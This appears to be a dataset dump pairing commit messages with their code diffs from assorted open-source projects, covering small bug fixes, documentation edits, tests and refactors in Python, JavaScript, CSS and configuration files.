message
stringlengths 13
484
| diff
stringlengths 38
4.63k
|
---|---|
dark-mode: Make settings page code blocks compatible.
This makes the code blocks compatible by changing the background to be darker and the text color to be base (white). | @@ -332,6 +332,7 @@ body.dark-mode .top-messages-logo svg circle {
body.dark-mode #unmute_muted_topic_notification,
body.dark-mode .message_content code,
body.dark-mode .message_edit_content code,
+body.dark-mode #settings_page code,
body.dark-mode .typeahead.dropdown-menu {
background-color: hsl(212, 25%, 15%);
border-color: hsla(0, 0%, 0%, 0.5);
|
make root comparison case insensitive for windows
find_root_template_from_path tries to find the root in the passed path with case sensitivity; on Windows this doesn't make sense, since C:// == c://.
Keep all other paths case sensitive. | @@ -1106,17 +1106,21 @@ class RootItem(FormatObject):
result = False
output = str(path)
- root_paths = list(self.cleaned_data.values())
mod_path = self.clean_path(path)
- for root_path in root_paths:
+ for root_os, root_path in self.cleaned_data.items():
# Skip empty paths
if not root_path:
continue
- if mod_path.startswith(root_path):
+ _mod_path = mod_path # reset to original cleaned value
+ if root_os == "windows":
+ root_path = root_path.lower()
+ _mod_path = _mod_path.lower()
+
+ if _mod_path.startswith(root_path):
result = True
replacement = "{" + self.full_key() + "}"
- output = replacement + mod_path[len(root_path):]
+ output = replacement + _mod_path[len(root_path):]
break
return (result, output)
@@ -1206,6 +1210,7 @@ class Roots:
Raises:
ValueError: When roots are not entered and can't be loaded.
"""
+ print("!roots::{}".format(roots))
if roots is None:
log.debug(
"Looking for matching root in path \"{}\".".format(path)
@@ -1216,10 +1221,12 @@ class Roots:
raise ValueError("Roots are not set. Can't find path.")
if isinstance(roots, RootItem):
+ print("here")
return roots.find_root_template_from_path(path)
for root_name, _root in roots.items():
- success, result = self.find_root_template_from_path(path, _root)
+ print("root::{}".format(_root))
+ success, result = self.find_root_template_from_path(path.lower(), _root)
if success:
log.info("Found match in root \"{}\".".format(root_name))
return success, result
|
make sure we quote extra_kernel_options
argparse will remove quotations, breaking extra_kernel_options and
inspector_extra_kernel_options when more than one option is used, e.g.
--extra-vars extra_kernel_options="console=tty1 console=ttyS0,115200n8" | @@ -50,9 +50,16 @@ def log(*message, only_if=True):
def process_extra_vars(extra_vars):
for item in extra_vars:
+
+ # argparse removes quotes, just add quotes for these vars
+ if 'extra_kernel_options=' in item:
+ key, value = item.split('=', 1)
+ item = key + '="' + value + '"'
+
if item.startswith('@'):
# Make sure relative paths still work
item = '@' + os.path.abspath(item[1:])
+
yield ('-e', item)
|
Add test cases to verify port number 0 for port_forwarding
Floating IP port forwarding internal or external port number should
not allow 0, otherwise you will get some ValueError exception in
neutron server.
Closes-Bug: | @@ -138,6 +138,20 @@ class PortForwardingTestCase(PortForwardingTestCaseBase):
self._remove_router_interface(self.router['id'], subnet_2['id'])
self._remove_router_interface(self.router['id'], subnet_3['id'])
+ def test_create_floatingip_port_forwarding_external_port_0(self):
+ self.port_forwarding[apidef.RESOURCE_NAME][apidef.EXTERNAL_PORT] = 0
+
+ self.assertRaises(ValueError,
+ self.pf_plugin.create_floatingip_port_forwarding,
+ self.context, self.fip['id'], self.port_forwarding)
+
+ def test_create_floatingip_port_forwarding_internal_port_0(self):
+ self.port_forwarding[apidef.RESOURCE_NAME][apidef.INTERNAL_PORT] = 0
+
+ self.assertRaises(ValueError,
+ self.pf_plugin.create_floatingip_port_forwarding,
+ self.context, self.fip['id'], self.port_forwarding)
+
def test_negative_create_floatingip_port_forwarding(self):
self.pf_plugin.create_floatingip_port_forwarding(
self.context, self.fip['id'], self.port_forwarding)
|
Fixed examples/text_style_transfer README
Fixes | @@ -8,7 +8,7 @@ This example implements a simplified variant of the `ctrl-gen` model from
The model roughly has an architecture of `Encoder--Decoder--Classifier`. Compared to the paper, following simplications are made:
* Replaces the base Variational Autoencoder (VAE) model with an attentional Autoencoder (AE) -- VAE is not necessary in the text style transfer setting since we do not need to interpolate the latent space as in the paper.
- * Attribute classifier (i.e., discriminator) is pre-trained, and fixed throughout the full model training.
+ * Attribute classifier (i.e., discriminator) is trained with real data only. Samples generated by the decoder are not used.
* Independency constraint is omitted.
## Usage ##
|
Update lasso.pyx
Lasso Regression:
Remove extra comma to say "coefficients for feature selection and improves" and "cuDF DataFrame and uses coordinate descent" | @@ -28,9 +28,9 @@ class Lasso:
Lasso extends LinearRegression by providing L1 regularization on the
coefficients when predicting response y with a linear combination of the
predictors in X. It can zero some of the coefficients for feature
- selection, and improves the conditioning of the problem.
+ selection and improves the conditioning of the problem.
- cuML's Lasso an array-like object or cuDF DataFrame, and
+ cuML's Lasso an array-like object or cuDF DataFrame and
uses coordinate descent to fit a linear model.
Examples
|
fix(telegram): Telegram does not always return full set of data
Checks for fields added | @@ -18,11 +18,14 @@ class TelegramProvider(Provider):
return data["id"]
def extract_common_fields(self, data):
- return {
- "first_name": data["first_name"],
- "last_name": data["last_name"],
- "username": data["username"],
- }
+ ret = {}
+ if data.get("first_name"):
+ ret["first_name"] = data.get("first_name")
+ if data.get("last_name"):
+ ret["last_name"] = data.get("last_name")
+ if data.get("username"):
+ ret["username"] = data.get("username")
+ return ret
provider_classes = [TelegramProvider]
|
[Cocoa] Implement support for file input control
Display an open file dialog when an <input type="file"> HTML element is
clicked. | @@ -64,6 +64,15 @@ class BrowserView:
alert.setInformativeText_(message)
alert.runModal()
+ # Display an open panel for <input type="file"> element
+ def webView_runOpenPanelForFileButtonWithResultListener_allowMultipleFiles_(self, webview, listener, allow_multiple):
+ files = BrowserView.instance.create_file_dialog(OPEN_DIALOG, '', allow_multiple, '', main_thread=True)
+
+ if files:
+ listener.chooseFilenames_(files)
+ else:
+ listener.cancel()
+
def webView_printFrameView_(self, webview, frameview):
"""
This delegate method is invoked when a script or a user wants to print a webpage (e.g. using the Javascript window.print() method)
@@ -261,7 +270,7 @@ class BrowserView:
PyObjCTools.AppHelper.callAfter(load, content, base_uri)
- def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename):
+ def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, main_thread=False):
def create_dialog(*args):
dialog_type = args[0]
@@ -305,11 +314,15 @@ class BrowserView:
else:
self._file_name = None
+ if not main_thread:
self._file_name_semaphor.release()
+ if main_thread:
+ create_dialog(dialog_type, allow_multiple, save_filename)
+ else:
PyObjCTools.AppHelper.callAfter(create_dialog, dialog_type, allow_multiple, save_filename)
-
self._file_name_semaphor.acquire()
+
return self._file_name
def _add_app_menu(self):
|
Update javascript reverse string
Javascript was slightly misrepresented in the statement "JavaScript only
runs in a web environment..." in jrg94/sample-programs#93 . `node` is
the command line used to run JavaScript without a web environment. I
have updated reverse-string.js to run with node `node
reverse-string.js`. | -function reverse(s) {
- return s.split('').reverse().join('');
-}
-
-function main() {
- var toReverse = prompt("Enter a String", "Hello, World!");
- if (toReverse != null) {
- console.log(reverse(toReverse))
- }
-}
-
-main()
+const readline = require('readline');
+
+const reverse = s => s.split('').reverse().join('');
+
+const rl = readline.createInterface({
+ input: process.stdin,
+ output: process.stdout
+});
+
+const question = 'Enter a String: ';
+
+rl.question(question, (answer) => {
+ console.log(reverse(answer));
+ rl.close();
+});
|
[ENH] Fix Coalesce to use only bfill
* use bfill only for coalesce
* use bfill only for coalesce
* Update coalesce.py
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see
* Update coalesce.py | @@ -17,14 +17,18 @@ def coalesce(
) -> pd.DataFrame:
"""Coalesce two or more columns of data in order of column names provided.
- Given the list of column names, `coalesce` finds and returns the first
- non-missing value from these columns, for every row in the input dataframe.
- If all the column values are null for a particular row, then the
- `default_value` will be filled in.
+ Given the variable arguments of column names,
+ `coalesce` finds and returns the first non-missing value
+ from these columns, for every row in the input dataframe.
+ If all the column values are null for a particular row,
+ then the `default_value` will be filled in.
+
+ If `target_column_name` is not provided,
+ then the first column is coalesced.
This method does not mutate the original DataFrame.
- Example: Using `coalesce` with 3 columns, "a", "b" and "c".
+ Example: Use `coalesce` with 3 columns, "a", "b" and "c".
>>> import pandas as pd
>>> import numpy as np
@@ -34,13 +38,21 @@ def coalesce(
... "b": [2, 3, np.nan],
... "c": [4, np.nan, np.nan],
... })
+ >>> df.coalesce("a", "b", "c")
+ a b c
+ 0 2.0 2.0 4.0
+ 1 1.0 3.0 NaN
+ 2 NaN NaN NaN
+
+ Example: Provide a target_column_name.
+
>>> df.coalesce("a", "b", "c", target_column_name="new_col")
a b c new_col
0 NaN 2.0 4.0 2.0
1 1.0 3.0 NaN 1.0
2 NaN NaN NaN NaN
- Example: Providing a default value.
+ Example: Provide a default value.
>>> import pandas as pd
>>> import numpy as np
@@ -93,13 +105,8 @@ def coalesce(
if target_column_name is None:
target_column_name = column_names[0]
- # bfill/ffill combo is faster than combine_first
- outcome = (
- df.filter(column_names)
- .bfill(axis="columns")
- .ffill(axis="columns")
- .iloc[:, 0]
- )
+
+ outcome = df.filter(column_names).bfill(axis="columns").iloc[:, 0]
if outcome.hasnans and (default_value is not None):
outcome = outcome.fillna(default_value)
|
[IMPR] do not compare against None but use explicit "is None"
do not compare against None but use explicit "is None"
also use an explicit return at the end of the function
if the function already has a return value other than None | @@ -76,20 +76,17 @@ class HttpRequest:
@property
def exception(self):
"""Get the exception, if any."""
- if isinstance(self.data, Exception):
- return self.data
+ return self.data if isinstance(self.data, Exception) else None
@property
def response_headers(self):
"""Return the response headers."""
- if not self.exception:
- return self.data.headers
+ return self.data.headers if not self.exception else None
@property
def raw(self):
"""Return the raw response body."""
- if not self.exception:
- return self.data.content
+ return self.data.content if not self.exception else None
@property
def parsed_uri(self):
@@ -109,8 +106,7 @@ class HttpRequest:
@rtype: int
"""
- if not self.exception:
- return self.data.status_code
+ return self.data.status_code if not self.exception else None
@property
def header_encoding(self):
@@ -146,15 +142,15 @@ class HttpRequest:
charset = 'latin1'
else:
charset = self.charset
+ lookup = codecs.lookup(charset) if charset else None
if (self.header_encoding
- and codecs.lookup(
- self.header_encoding) != (
- codecs.lookup(charset) if charset else None)):
+ and (lookup is None
+ or codecs.lookup(self.header_encoding) != lookup)):
if charset:
pywikibot.warning(
- 'Encoding "{0}" requested but "{1}" '
- 'received in the header.'.format(
- charset, self.header_encoding))
+ 'Encoding "{}" requested but "{}" '
+ 'received in the header.'
+ .format(charset, self.header_encoding))
try:
# TODO: Buffer decoded content, weakref does remove it too
# early (directly after this method)
|
replace maxradius by extdiam
This patch replaces the maxradius parameter by extdiam, for external diameter,
which is a better fit to the cylinder diameter that is used as the reference
length in the computation. | @@ -69,7 +69,7 @@ class PostProcessor:
self.regularize_xgrd()
-def main(nelems: int, degree: int, reynolds: float, rotation: float, timestep: float, maxradius: float, endtime: float):
+def main(nelems: int, degree: int, reynolds: float, rotation: float, timestep: float, extdiam: float, endtime: float):
'''
Flow around a cylinder.
@@ -89,15 +89,15 @@ def main(nelems: int, degree: int, reynolds: float, rotation: float, timestep: f
Cylinder rotation speed.
timestep [.04]
Time step
- maxradius [25]
- Target exterior radius; the actual domain size is subject to integer
+ extdiam [50]
+ Target exterior diameter; the actual domain size is subject to integer
multiples of the configured element size.
endtime [inf]
Stopping time.
'''
elemangle = 2 * numpy.pi / nelems
- melems = int(numpy.log(2*maxradius) / elemangle + .5)
+ melems = round(numpy.log(extdiam) / elemangle)
treelog.info('creating {}x{} mesh, outer radius {:.2f}'.format(melems, nelems, .5*numpy.exp(elemangle*melems)))
domain, geom = mesh.rectilinear([melems, nelems], periodic=(1,))
domain = domain.withboundary(inner='left', inflow=domain.boundary['right'][nelems//2:])
@@ -164,7 +164,7 @@ if __name__ == '__main__':
class test(testing.TestCase):
def test_rot0(self):
- args = main(nelems=6, degree=3, reynolds=100, rotation=0, timestep=.1, maxradius=25, endtime=.1)
+ args = main(nelems=6, degree=3, reynolds=100, rotation=0, timestep=.1, extdiam=50, endtime=.1)
with self.subTest('velocity'):
self.assertAlmostEqual64(args['u'], '''
eNoBkABv//AzussRy7rL8DNVNU42sskxyLLJTjbPN7Q4SscGxkrHtDj9ObM6SMXmw0jFszofPFU8nsNk
@@ -176,7 +176,7 @@ class test(testing.TestCase):
Ogw4NMhAxu42Ij1DxCI97jZ+wirgIsM=''')
def test_rot1(self):
- args = main(nelems=6, degree=3, reynolds=100, rotation=1, timestep=.1, maxradius=25, endtime=.1)
+ args = main(nelems=6, degree=3, reynolds=100, rotation=1, timestep=.1, extdiam=50, endtime=.1)
with self.subTest('velocity'):
self.assertAlmostEqual64(args['u'], '''
eNoBkABv//czw8sRy7HL6TNVNU82tckxyLDJTTbPN7Q4SscGxkrHszj9ObM6SMXmw0jFszofPFU8nsNk
|
fix version logic
Added documentation. | @@ -91,15 +91,19 @@ class CollectPublishedFiles(pyblish.api.ContextPlugin):
host_name="webpublisher",
project_settings=context.data["project_settings"]
)
- next_versions.append(self._get_next_version(
+ version = self._get_next_version(
project_name, asset_doc, subset_name
- ))
+ )
+ next_versions.append(version)
instance = context.create_instance(subset_name)
instance.data["asset"] = asset_name
instance.data["subset"] = subset_name
+ # set configurable result family
instance.data["family"] = family
+ # set configurable additional families
instance.data["families"] = families
+ instance.data["version"] = version
instance.data["stagingDir"] = tempfile.mkdtemp()
instance.data["source"] = "webpublisher"
@@ -146,6 +150,7 @@ class CollectPublishedFiles(pyblish.api.ContextPlugin):
if not self.sync_version:
return
+ # overwrite specific version with same version for all
max_next_version = max(next_versions)
for inst in instances:
inst.data["version"] = max_next_version
@@ -187,7 +192,7 @@ class CollectPublishedFiles(pyblish.api.ContextPlugin):
"ext": ext[1:],
"files": files,
"stagingDir": task_dir,
- "tags": tags
+ "tags": tags # configurable tags from Settings
}
self.log.info("sequences repre_data.data:: {}".format(repre_data))
return [repre_data]
|
Update super-admin-remove-facility.feature
Added 'Examples' | @@ -7,7 +7,7 @@ Feature: Remove facility
Scenario: Successfuly remove facility
Given there are at least two facilities on my device
- Given my super admin account is not a member of the <facility>
+ And my super admin account is not a member of the <facility>
When I click *Options* for <facility>
When I click *Remove facility*
Then I see the modal to *Remove facility from this device*
@@ -62,5 +62,5 @@ Feature: Remove facility
Examples:
-| ??? | ??? |
-| ?????!?! |
+| facility |
+| MySchool |
|
Improve performance of matrix_equal function
Improve performance of matrix_equal function by approx 4x by preventing copying array inputs and preventing unnecessarily iterating over the full array to find the first non-zero entry. | @@ -52,19 +52,26 @@ def matrix_equal(mat1,
atol = ATOL_DEFAULT
if rtol is None:
rtol = RTOL_DEFAULT
+
+ if not isinstance(mat1, np.ndarray):
mat1 = np.array(mat1)
+ if not isinstance(mat2, np.ndarray):
mat2 = np.array(mat2)
+
if mat1.shape != mat2.shape:
return False
+
if ignore_phase:
# Get phase of first non-zero entry of mat1 and mat2
# and multiply all entries by the conjugate
- phases1 = np.angle(mat1[abs(mat1) > atol].ravel(order='F'))
- if len(phases1) > 0:
- mat1 = np.exp(-1j * phases1[0]) * mat1
- phases2 = np.angle(mat2[abs(mat2) > atol].ravel(order='F'))
- if len(phases2) > 0:
- mat2 = np.exp(-1j * phases2[0]) * mat2
+ for elt in mat1.flat:
+ if abs(elt) > atol:
+ mat1 = np.exp(-1j * np.angle(elt)) * mat1
+ break
+ for elt in mat2.flat:
+ if abs(elt) > atol:
+ mat2 = np.exp(-1j * np.angle(elt)) * mat2
+ break
return np.allclose(mat1, mat2, rtol=rtol, atol=atol)
|
Harden 'test_access_to_public_bucket' systest against 429 / 503 errors.
Closes | @@ -1335,9 +1335,9 @@ class TestAnonymousClient(unittest.TestCase):
def test_access_to_public_bucket(self):
anonymous = storage.Client.create_anonymous_client()
bucket = anonymous.bucket(self.PUBLIC_BUCKET)
- blob, = bucket.list_blobs(max_results=1)
+ blob, = retry_429_503(bucket.list_blobs)(max_results=1)
with tempfile.TemporaryFile() as stream:
- blob.download_to_file(stream)
+ retry_429_503(blob.download_to_file)(stream)
class TestKMSIntegration(TestStorageFiles):
|
feat: Add Wei.to() method for unit conversion
Accepts a unit as string and will return a Fixed number converted to the desired unit type | @@ -74,6 +74,12 @@ class Wei(int):
def __sub__(self, other: Any) -> "Wei":
return Wei(super().__sub__(_to_wei(other)))
+ def to(self, unit: str) -> Decimal:
+ try:
+ return _to_fixed(self) * Decimal(10) ** (-Decimal(UNITS[unit]))
+ except KeyError:
+ raise TypeError(f'Cannot convert wei to unknown unit: "{unit}". ')
+
def _to_wei(value: WeiInputTypes) -> int:
original = value
|
fw/descriptor: Add parameter list for Telnet connections.
`TelnetConnection` no longer uses the same parameter list as
`SSHConnection`, so create its own parameter list. | @@ -20,7 +20,7 @@ from copy import copy
from devlib import (LinuxTarget, AndroidTarget, LocalLinuxTarget,
ChromeOsTarget, Platform, Juno, TC2, Gem5SimulationPlatform,
AdbConnection, SshConnection, LocalConnection,
- Gem5Connection)
+ TelnetConnection, Gem5Connection)
from devlib.target import DEFAULT_SHELL_PROMPT
from wa.framework import pluginloader
@@ -364,6 +364,46 @@ CONNECTION_PARAMS = {
""",
deprecated=True),
],
+ TelnetConnection: [
+ Parameter(
+ 'host', kind=str, mandatory=True,
+ description="""
+ Host name or IP address of the target.
+ """),
+ Parameter(
+ 'username', kind=str, mandatory=True,
+ description="""
+ User name to connect with
+ """),
+ Parameter(
+ 'password', kind=str,
+ description="""
+ Password to use.
+ """),
+ Parameter(
+ 'port', kind=int,
+ description="""
+ The port SSH server is listening on on the target.
+ """),
+ Parameter(
+ 'password_prompt', kind=str,
+ description="""
+ Password prompt to expect
+ """),
+ Parameter(
+ 'original_prompt', kind=str,
+ description="""
+ Original shell prompt to expect.
+ """),
+ Parameter(
+ 'sudo_cmd', kind=str,
+ default="sudo -- sh -c {}",
+ description="""
+ Sudo command to use. Must have ``{}`` specified
+ somewhere in the string it indicate where the command
+ to be run via sudo is to go.
+ """),
+ ],
Gem5Connection: [
Parameter(
'host', kind=str, mandatory=False,
|
Give the actual .netrc path
It's not `/root/.netrc` as the `~` implied. | @@ -938,7 +938,7 @@ URL using the format ``https://<user>:<password>@<url>``, like so:
gitfs_remotes:
- https://git:[email protected]/myrepo.git
-The other way would be to configure the authentication in ``~/.netrc``:
+The other way would be to configure the authentication in ``/var/lib/salt/.netrc``:
.. code-block:: text
|
fix(listview): Smart parsing of route options
Fieldname should also be searched in child tables | @@ -50,18 +50,7 @@ frappe.views.ListView = class ListView extends frappe.views.BaseList {
if (frappe.route_options) {
// Priority 1: route filters
- let filters = [];
- for (let key in frappe.route_options) {
- let value = frappe.route_options[key];
- if (value.startsWith('[') && value.endsWith(']')) {
- value = JSON.parse(value);
- } else {
- value = ['=', value];
- }
- filters.push([this.doctype, key, ...value])
- }
- this.filters = filters;
- frappe.route_options = null;
+ this.filters = this.parse_filters_from_route_options();
} else if (this.view_user_settings.filters) {
// Priority 2: saved filters
const saved_filters = this.view_user_settings.filters;
@@ -1126,11 +1115,17 @@ frappe.views.ListView = class ListView extends frappe.views.BaseList {
return actions_menu_items;
}
- set_filters_from_route_options() {
+ parse_filters_from_route_options() {
const filters = [];
+
for (let field in frappe.route_options) {
- var value = frappe.route_options[field];
- var doctype = null;
+
+ let doctype = null;
+ let value = frappe.route_options[field];
+
+ if (value.startsWith('[') && value.endsWith(']')) {
+ value = JSON.parse(value);
+ }
// if `Child DocType.fieldname`
if (field.includes('.')) {
@@ -1157,10 +1152,7 @@ frappe.views.ListView = class ListView extends frappe.views.BaseList {
}
frappe.route_options = null;
- this.filter_area.clear(false)
- .then(() => {
- this.filter_area.add(filters);
- });
+ return filters;
}
static trigger_list_update(data) {
|
doc: Fix command output in scheduler document
Closes-Bug: | @@ -1119,7 +1119,7 @@ the aggregate. Then, you add the ``node1``, and ``node2`` compute nodes to it.
| created_at | 2016-12-22T07:31:13.000000 |
| deleted | False |
| deleted_at | None |
- | hosts | [u'node2'] |
+ | hosts | [u'node1', u'node2'] |
| id | 1 |
| metadata | {u'ssd': u'true', u'availability_zone': u'nova'} |
| name | fast-io |
|
utils: Fix PreAuth signer in signer_key_xdr_object.
The comparison was never triggered and the PreAuth signer was not added to XDR.
Issue: | @@ -54,7 +54,7 @@ def signer_key_xdr_object(signer_type, signer):
return Xdr.types.SignerKey(Xdr.const.SIGNER_KEY_TYPE_ED25519, decode_check('account', signer))
if signer_type == 'hashX':
return Xdr.types.SignerKey(Xdr.const.SIGNER_KEY_TYPE_HASH_X, hashX=signer)
- if signer_type == 'preAuthTX':
+ if signer_type == 'preAuthTx':
return Xdr.types.SignerKey(Xdr.const.SIGNER_KEY_TYPE_PRE_AUTH_TX, preAuthTx=signer)
|
Fixes Circuit.convert_to_openqasm() and .convert_to_quil().
These were broken (w/NotImplementedError added) since the great
renaming. It turns out getting them working again just required
adding ".components" in a couple of places so that iteration over a
circuit layer now works properly. | @@ -1938,7 +1938,7 @@ class Circuit(object):
str
A quil string.
"""
- raise NotImplementedError("TODO: need to upgrade this method")
+
# create standard conversations.
if gatename_conversion is None:
gatename_conversion = _itgs.get_standard_gatenames_quil_conversions()
@@ -1973,7 +1973,7 @@ class Circuit(object):
qubits_used = []
# Go through the (non-self.identity) gates in the layer and convert them to quil
- for gate in layer:
+ for gate in layer.components:
gate_qubits = gate.qubits if (gate.qubits is not None) else self.line_labels
assert(len(gate_qubits) <= 2 or gate.qubits is None), 'LinearOperator on more than 2 qubits given; this is currently not supported!'
@@ -2053,7 +2053,7 @@ class Circuit(object):
str
An openqasm string.
"""
- raise NotImplementedError("TODO: need to upgrade this method")
+
# create standard conversations.
if gatename_conversion is None:
gatename_conversion = _itgs.get_standard_gatenames_openqasm_conversions()
@@ -2091,7 +2091,7 @@ class Circuit(object):
qubits_used = []
# Go through the (non-self.identity) gates in the layer and convert them to openqasm
- for gate in layer:
+ for gate in layer.components:
gate_qubits = gate.qubits if (gate.qubits is not None) else self.line_labels
assert(len(gate_qubits) <= 2), 'Gates on more than 2 qubits given; this is currently not supported!'
|
search: Add defaultSortingOnEmptyQueryString in search config
Change the default sorting to newest in case the query string is left empty | }
},
"sortOrderDisabled": true,
+ "defaultSortingOnEmptyQueryString": {
+ "sortBy": "newest"
+ },
"sortOptions": [
{
"sortBy": "bestmatch",
|
Changed reduce sum to a simple addition
This should speed up computation time | @@ -135,7 +135,7 @@ class TensorflowRewardManager(reward_manager.RewardManager):
lambda: self.zero_reward)
new_r = newest_reward + tf.multiply(self.discount_factor, previous_reward)
index = tf.reshape(counter, [1])
- reward = tf.reshape(tf.reduce_sum(new_r), [1])
+ reward = new_r[0] + new_r[1]
update_tensor = tf.scatter_nd(index, reward, tf.shape(discounted_rewards))
new_discounted_rewards = discounted_rewards + update_tensor
new_counter = counter - tf.constant(1)
|
Added info about RethinkDB storage
(not sure if it has to be done manually) | @@ -16,3 +16,10 @@ Redis storage
.. automodule:: aiogram.contrib.fsm_storage.redis
:members:
:show-inheritance:
+
+RethinkDB storage
+-----------------
+
+.. automodule:: aiogram.contrib.fsm_storage.rethinkdb
+ :members:
+ :show-inheritance:
|
Allowed grid mode to fall back to hanging grid
When there are very long package or module names, the grid mode sometimes outputs lines longer than line_length. We now fall back to mode 4 if it's more compact or if mode 0 violates the line_length. | @@ -503,6 +503,16 @@ class SortImports(object):
if do_multiline_reformat:
import_statement = self._multi_line_reformat(import_start, from_import_section, comments)
+ if self.config['multi_line_output'] == 0:
+ self.config['multi_line_output'] = 4
+ try:
+ other_import_statement = self._multi_line_reformat(import_start, from_import_section, comments)
+ if (other_import_statement.count('\n') < import_statement.count('\n')
+ or max(len(x)
+ for x in import_statement.split('\n')) > self.config['line_length']):
+ import_statement = other_import_statement
+ finally:
+ self.config['multi_line_output'] = 0
if not do_multiline_reformat and len(import_statement) > self.config['line_length']:
import_statement = self._wrap(import_statement)
|
Added `-it` param to `docker run` installation with Docker
Document use of interactive shell in docker | @@ -40,7 +40,7 @@ Check out the [Getting Started](https://www.youtube.com/watch?v=7wyIi_cpodE&list
docker pull opsdroid/opsdroid:latest
# Run the container
-docker run --rm -v /path/to/configuration.yaml:/etc/opsdroid/configuration.yaml:ro opsdroid/opsdroid:latest
+docker run --rm -it -v /path/to/configuration.yaml:/etc/opsdroid/configuration.yaml:ro opsdroid/opsdroid:latest
```
### Ubuntu 16.04 LTS
|
[varLib] Start generating STAT table
Right now just reflects the axes, and even that with certain limitations:
AxisOrdering is set to the order axes are defined,
Name-table entries are not shared with fvar.
Towards | @@ -167,6 +167,31 @@ def _add_avar(font, axes):
return avar
+def _add_stat(font, axes):
+
+ nameTable = font['name']
+
+ assert "STAT" not in font
+ STAT = font["STAT"] = newTable('STAT')
+ stat = STAT.table = ot.STAT()
+ stat.Version = 0x00010000
+
+ axisRecords = []
+ for i,a in enumerate(axes.values()):
+ axis = ot.AxisRecord()
+ axis.AxisTag = Tag(a.tag)
+ # Meh. Reuse fvar nameID!
+ axis.AxisNameID = nameTable.addName(tounicode(a.labelname['en']))
+ axis.AxisOrdering = i
+ axisRecords.append(axis)
+
+ axisRecordArray = ot.AxisRecordArray()
+ axisRecordArray.Axis = axisRecords
+ # XXX these should not be hard-coded but computed automatically
+ stat.DesignAxisRecordSize = 8
+ stat.DesignAxisCount = len(axisRecords)
+ stat.DesignAxisRecord = axisRecordArray
+
# TODO Move to glyf or gvar table proper
def _GetCoordinates(font, glyphName):
"""font, glyphName --> glyph coordinates as expected by "gvar" table
@@ -675,6 +700,7 @@ def build(designspace_filename, master_finder=lambda s:s):
# TODO append masters as named-instances as well; needs .designspace change.
fvar = _add_fvar(vf, axes, instances)
+ _add_stat(vf, axes)
_add_avar(vf, axes)
del instances
|
Fix macOS Python 2.7 build
Currently Python 2.7 tests & builds were run twice for Linux instead.
Swap configuration to macOS 10.15, in par with Python 3 workflow,
and to make Process.environ tests pass (broken in macOS 11+). | @@ -81,16 +81,16 @@ jobs:
# Linux + macOS + Python 2
linux-macos-py2:
name: ${{ matrix.os }}-py2
- runs-on: ubuntu-latest
+ runs-on: ${{ matrix.os }}
timeout-minutes: 20
strategy:
fail-fast: false
matrix:
- os: [ubuntu-latest, macos-latest]
+ os: [ubuntu-latest, macos-10.15]
include:
- {name: Linux, python: '3.9', os: ubuntu-latest}
env:
- CIBW_ARCHS: 'x86_64 i686'
+ CIBW_ARCHS_LINUX: 'x86_64 i686'
CIBW_TEST_COMMAND:
PYTHONWARNINGS=always PYTHONUNBUFFERED=1 PSUTIL_DEBUG=1 python {project}/psutil/tests/runner.py &&
PYTHONWARNINGS=always PYTHONUNBUFFERED=1 PSUTIL_DEBUG=1 python {project}/psutil/tests/test_memleaks.py
|
Decode & in project -> "View Registration Form"
[#OSF-8522]
Registration Form data is HTML encoded before storing in postgres.
This PR HTML decodes & in data before presentation. | @@ -210,6 +210,9 @@ var Question = function(questionSchema, data) {
value = self.data.value();
} else {
value = self.data.value || null;
+ if(value) {
+ value = $osf.decodeText(value);
+ }
}
if (self.type === 'choose' && self.format === 'multiselect') {
|
Use explicit `OpenPrescribing-Bot` user-agent
The default `requests` user-agent appears to be blocked (using it
results in a 403 response) but this seems to work fine and is even
more polite of us so I can't see how it could be objected to. | @@ -17,6 +17,10 @@ from openprescribing.slack import notify_slack
logger = logging.getLogger(__file__)
+DEFAULT_HEADERS = {
+ "User-Agent": "OpenPrescribing-Bot (+https://openprescribing.net)",
+}
+
class Command(BaseCommand):
def handle(self, *args, **kwargs):
@@ -52,7 +56,7 @@ class Command(BaseCommand):
def download_archive(self):
url = "https://psnc.org.uk/funding-and-reimbursement/reimbursement/price-concessions/archive/"
- rsp = requests.get(url)
+ rsp = requests.get(url, headers=DEFAULT_HEADERS)
return bs4.BeautifulSoup(rsp.content, "html.parser")
def import_from_current(self):
@@ -74,7 +78,7 @@ class Command(BaseCommand):
def download_current(self):
url = "https://psnc.org.uk/funding-and-reimbursement/reimbursement/price-concessions/"
- rsp = requests.get(url)
+ rsp = requests.get(url, headers=DEFAULT_HEADERS)
return bs4.BeautifulSoup(rsp.content, "html.parser")
def date_from_heading(self, heading):
|
Make an assert on a hotpath trigger only in DEBUG mode.
Summary:
Pull Request resolved:
Test Plan: Imported from OSS | @@ -62,7 +62,7 @@ inline Return KernelFunction::callUnboxed(const OperatorHandle& opHandle, Args..
return (*func)(getFunctor_(), std::forward<Args>(args)...);
}
- TORCH_INTERNAL_ASSERT(boxed_kernel_func_ != nullptr, "Tried to call KernelFunction::callUnboxed() on an uninitialized KernelFunction.");
+ TORCH_INTERNAL_ASSERT_DEBUG_ONLY(boxed_kernel_func_ != nullptr, "Tried to call KernelFunction::callUnboxed() on an uninitialized KernelFunction.");
return impl::boxAndCallBoxedFunc<Return, Args...>(boxed_kernel_func_, getFunctor_(), opHandle, std::forward<Args>(args)...);
}
|
Fix invalid MD enumeration
Just that, the enumeration was invalidly formatted, with line break. No content change. | @@ -23,8 +23,7 @@ The easy way
1. Create a subclass from the dataset class of your choice
2. Define custom functions containing your business logic
-3. Use the `column_map_expectation` and `column_aggregate_expectation` decorators to turn them into full Expectations. Note that each dataset class implements its own versions of `@column_map_expectation` and `@column_aggregate_expectation`, so you should consult the documentation of each class to ensure you
-are returning the correct information to the decorator.
+3. Use the `column_map_expectation` and `column_aggregate_expectation` decorators to turn them into full Expectations. Note that each dataset class implements its own versions of `@column_map_expectation` and `@column_aggregate_expectation`, so you should consult the documentation of each class to ensure you are returning the correct information to the decorator.
Note: following Great Expectations :ref:`naming_conventions` is highly recommended, but not strictly required. If you want to confuse yourself with bad names, the package won't stop you.
|
GREP for PR reference accepts references that are split over a line
Fixes | @@ -16,6 +16,6 @@ jobs:
- name: Grep CHANGES.md for PR number
if: contains(github.event.pull_request.labels.*.name, 'skip news') != true
run: |
- grep -P "PR #${{ github.event.pull_request.number }}[^0-9]" CHANGES.md || \
+ grep -Pz "PR( |\n\s*)#${{ github.event.pull_request.number }}[^0-9]" CHANGES.md || \
(echo "Please add 'PR #${{ github.event.pull_request.number }}' change line to CHANGES.md" && \
exit 1)
|
